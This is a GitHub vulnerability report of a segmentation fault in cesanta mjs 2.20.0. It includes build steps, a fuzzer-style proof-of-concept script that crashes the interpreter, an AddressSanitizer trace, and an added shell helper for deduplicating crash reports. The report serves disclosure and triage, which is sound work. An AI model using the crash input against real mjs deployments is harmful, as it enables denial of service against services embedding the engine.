SEGV in mjs_getretvalpos #251

Open
vorfreuder opened this issue Nov 18, 2023 · 0 comments

vorfreuder commented Nov 18, 2023

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the mjs.c file.

Vulnerability Type
segmentation violation

Environment

  • Operating System
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
  • Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs
poc
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify+= i;
c /= 0, c } 0let s = '08888888888888    true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

ASAN info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
==184==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
    #1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
    #2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
    #3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
    #4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
    #5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
    #6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
    #7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
    #8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
    #9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
    #10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf
==184==ABORTING
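The trace above is typical of a fuzzer-found crash: the top four frames are glibc's assertion machinery, and the first frame that belongs to the target is mjs_getretvalpos, so the crash is really a failed assert reached from mjs_op_json_stringify via mjs_arg rather than a bad read inside vasprintf. The helper below is an added example, not part of this issue or of the mjs project: it takes an AddressSanitizer report, skips runtime frames, and prints the first in-project frames as a dedup signature plus whether the signal was raised while libc was formatting an assertion message. The report text is a constructed copy of the one in the issue; the binary path /mjs/mjs and the depth of 3 are assumptions for the demo.

```shell
# Added triage helper for ASAN crash reports (example code, not from mjs).
# ASAN_REPORT is a constructed copy of the trace posted in this issue.

ASAN_REPORT='==184==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7ff84edb0535 bp 0x7ffea0260498 sp 0x7ffea0260498 T0)
==184==The signal is caused by a READ memory access.
    #0 0x7ff84edb0535 in vasprintf /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57
    #1 0x7ff84ed8d113 in asprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/asprintf.c:35
    #2 0x7ff84ed58353 in __assert_fail_base /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:57
    #3 0x7ff84ed58471 in __assert_fail /build/glibc-CVJwZb/glibc-2.27/assert/assert.c:101
    #4 0x4eeb98 in mjs_getretvalpos (/mjs/mjs+0x4eeb98)
    #5 0x4eebe5 in mjs_arg (/mjs/mjs+0x4eebe5)
    #6 0x4ec5e8 in mjs_op_json_stringify (/mjs/mjs+0x4ec5e8)
    #7 0x4ef755 in mjs_exec_internal (/mjs/mjs+0x4ef755)
    #8 0x4efa40 in mjs_exec_file (/mjs/mjs+0x4efa40)
    #9 0x4f75b9 in main (/mjs/mjs+0x4f75b9)
    #10 0x7ff84ed49c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41b7f9 in _start (/mjs/mjs+0x41b7f9)
SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/vasprintf.c:57 in vasprintf'

# crash_signature BINARY DEPTH
# Prints the first DEPTH frames whose location is inside BINARY, joined by
# "|". Frames in glibc or the sanitizer runtime are skipped, so two reports
# that abort through different libc paths still yield the same signature.
crash_signature() {
    printf '%s\n' "$ASAN_REPORT" | awk -v bin="$1" -v depth="$2" '
        /^ *#[0-9]+ / {
            fn = $4; loc = $5                      # "#n addr in FN LOC"
            if (index(loc, "(" bin "+") == 1) {    # LOC is "(BINARY+offset)"
                sig = (n == 0) ? fn : sig "|" fn
                if (++n == depth) exit             # exit still runs END
            }
        }
        END { print sig }'
}

# crash_kind
# Prints "assert" when __assert_fail is on the stack (the assert in the first
# in-project frame fired before the signal), otherwise the sanitizer error
# type taken from the ERROR line.
crash_kind() {
    if printf '%s\n' "$ASAN_REPORT" | grep -q '__assert_fail'; then
        echo assert
    else
        printf '%s\n' "$ASAN_REPORT" |
            sed -n 's/^==[0-9]*==ERROR: AddressSanitizer: \([A-Za-z-]*\).*/\1/p' |
            head -n 1
    fi
}

# Usage with the values assumed for this issue:
crash_signature /mjs/mjs 3   # mjs_getretvalpos|mjs_arg|mjs_op_json_stringify
crash_kind                   # assert
```

To use it on a real run, replace the ASAN_REPORT literal with the captured stderr of `mjs -f poc`; the signature is what you would key a crash-dedup table on, and the "assert" kind is the cue to look at the assertion in mjs_getretvalpos rather than at vasprintf.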